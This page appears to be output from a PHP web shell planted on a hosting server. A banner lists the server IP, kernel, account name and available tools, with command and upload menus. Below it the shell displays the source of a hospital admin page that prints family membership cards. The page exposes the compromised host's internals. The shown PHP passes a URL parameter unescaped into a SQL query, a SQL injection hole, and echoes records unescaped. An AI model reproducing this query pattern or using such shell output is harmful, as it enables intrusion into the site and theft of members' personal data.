Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/wellcare/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("includes/config.php");; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- <title>AdminLTE 3 | Invoice Print</title> --> <!-- Google Font: Source Sans Pro --> <link rel="stylesheet" href="dist/css/style.css"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700&display=fallback"> <!-- Font Awesome --> <link rel="stylesheet" href="plugins/fontawesome-free/css/all.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/adminlte.min.css"> </head> <body> <?php $id = $_GET['id']; $query = "SELECT * FROM families WHERE id='$id'"; $query_run =mysqli_query($conn, $query); if(mysqli_num_rows($query_run) > 0){ foreach($query_run as $row){ ?> <div class="wrapper"> <!-- Main content --> <section class="invoice" > <!-- title row --> <div class="row"> <div class="col-10 mt-3"> <h2><small class="float-right">Regd No.: RMEE2445160</small></h2> </div> <div class="col-12 mt-2"> <h2 class="h-two"> <img src="dist/img/logo.jpeg" class="logo-img" alt=""> WELL CARE HOSPITAL <small class="float-right"><img src="qrcodes/1001_qrcode.png" class="hhh" alt=""></small> <div class="tagline"> <div class="line"></div> <p class="tag">A Community Of Caring</p> <div class="line1"></div> </div> <p class="addr">Sec 101, Near Metro Station, Salarpur, Noida (G.B. Nagar)</p> </h2> </div> <div class="col-10 pem"> <p><b>Email:</b> wellcarehospital76@gmail.com , <b>Mobile:</b> 7303596181, 7303596171</p> </div> </div> <div class="col-10 pem"> <h5><b>WELL CARE HOSPITAL MEMBERSHIP</b></h5> </div> <div class="row"> <div class="col-10 table-responsive" > <table class="table table-striped"> <thead> <tr> <th style="border: 1px solid black;">Family-Id</th> <th style="border: 1px solid black;">Date Of Joining</th> <th style="border: 1px solid black;">Date Of Expiry</th> </tr> </thead> <tbody> <tr> <td>WCH-<?php echo $row['family_id'] ?></td> <td><?php echo $row['register_date'] ?></td> <td><?php echo $row['expire_date'] ?></td> </tr> </tbody> </table> </div> </div> <div class="row"> <div class="col-10 table-responsive" > <table class="table table-striped"> <thead> <tr> <th style="border: 1px solid black;">Proposer Name</th> <th style="border: 1px solid black;">Proposer Address</th> <th style="border: 1px solid black;">Proposer Contact No</th> </tr> </thead> <tbody> <tr> <td><?php echo $row['own_name'] ?></td> <td> <?php echo $row['h_no'] ?></td> <td><?php echo $row['phone'] ?></td> </tr> </tbody> </table> </div> </div> <div class="row"> <div class="col-10 table-responsive"> <table class="table table-striped"> <thead> <tr> <th style="border: 1px solid black;">Member Name</th> <th style="border: 1px solid black;">Age</th> <th style="border: 1px solid black;">Gender</th> <th style="border: 1px solid black;">Relationship With Proposer</th> </tr> </thead> <tbody> <tr> <td><?php echo $row['own_name'] ?></td> <td><?php echo $row['own_age'] ?></td> <td><?php echo $row['ownerGender'] ?></td> <td>Self</td> </tr> <tr> <td><?php echo $row['own_fname'] ?></td> <td><?php echo $row['own_fage'] ?></td> <td>Male</td> <td>Father</td> </tr> <tr> <td><?php echo $row['child1'] ?></td> <td><?php echo $row['child1age'] ?></td> <td><?php echo $row['child1Gender'] ?></td> <td><?php echo $row['rchild1'] ?></td> </tr> <tr> <td><?php echo $row['child2'] ?></td> <td><?php echo $row['child2age'] ?></td> <td><?php echo $row['child2Gender'] ?></td> <td><?php echo $row['rchild2'] ?></td> </tr> <tr> <td><?php echo $row['child3'] ?></td> <td><?php echo $row['child3age'] ?></td> <td><?php echo $row['child3Gender'] ?></td> <td><?php echo $row['rchild3'] ?></td> </tr> <tr> <td><?php echo $row['fm1'] ?></td> <td><?php echo $row['fm1age'] ?></td> <td><?php echo $row['fm1Gender'] ?></td> <td><?php echo $row['rfm1'] ?></td> </tr> <tr> <td><?php echo $row['fm2'] ?></td> <td><?php echo $row['fm2age'] ?></td> <td><?php echo $row['fm2Gender'] ?></td> <td><?php echo $row['rfm2'] ?></td> </tr> </tr> </tbody> </table> </div> </div> <img src="qrcodes/1001_qrcode.png" class="lll mb-4" alt=""> <div class="col-10 mb-3"> <p><b>Benefits of Well Care Hospital Membership:</b> <ul> <li>The consultancy fee (O.P.D) is totally free for one year.</li> <li>25% discount in blood tests.</li> <li>10% discount in medicine.</li> <li>15% discount in admitted patient (I.P.D)</li> </ul> </p> <p><b>Membership Card offers:</b> <ul> <li>A single-person membership card costs 299/- for one year validity.</li> <li>For two members, a membership card costs 399/- for one year validity.</li> <li>For five members, a membership card costs 499/- for one year validity.</li> </ul> </p> <p><b>Terms And Conditions:</b> <ul> <li> Only Dr Mohd Shakeel’s (MBBS) general physician consultancy fee (OPD) is free.</li> <li>All benefits and offers are same, but only others Doctors’s (OPD) consultancy is payable.</li> <li>The card payment can be approved through online or cash.</li> <li>This membership card is valid for only family members.</li> </ul> </p> </div> </section> </div> <?php }} ?> <style> .col-10 { flex: 0 0 66.666667%; max-width: 66.666667%; margin-left: 211px; } </style> <script> window.addEventListener("load", window.print()); </script> </body> </html>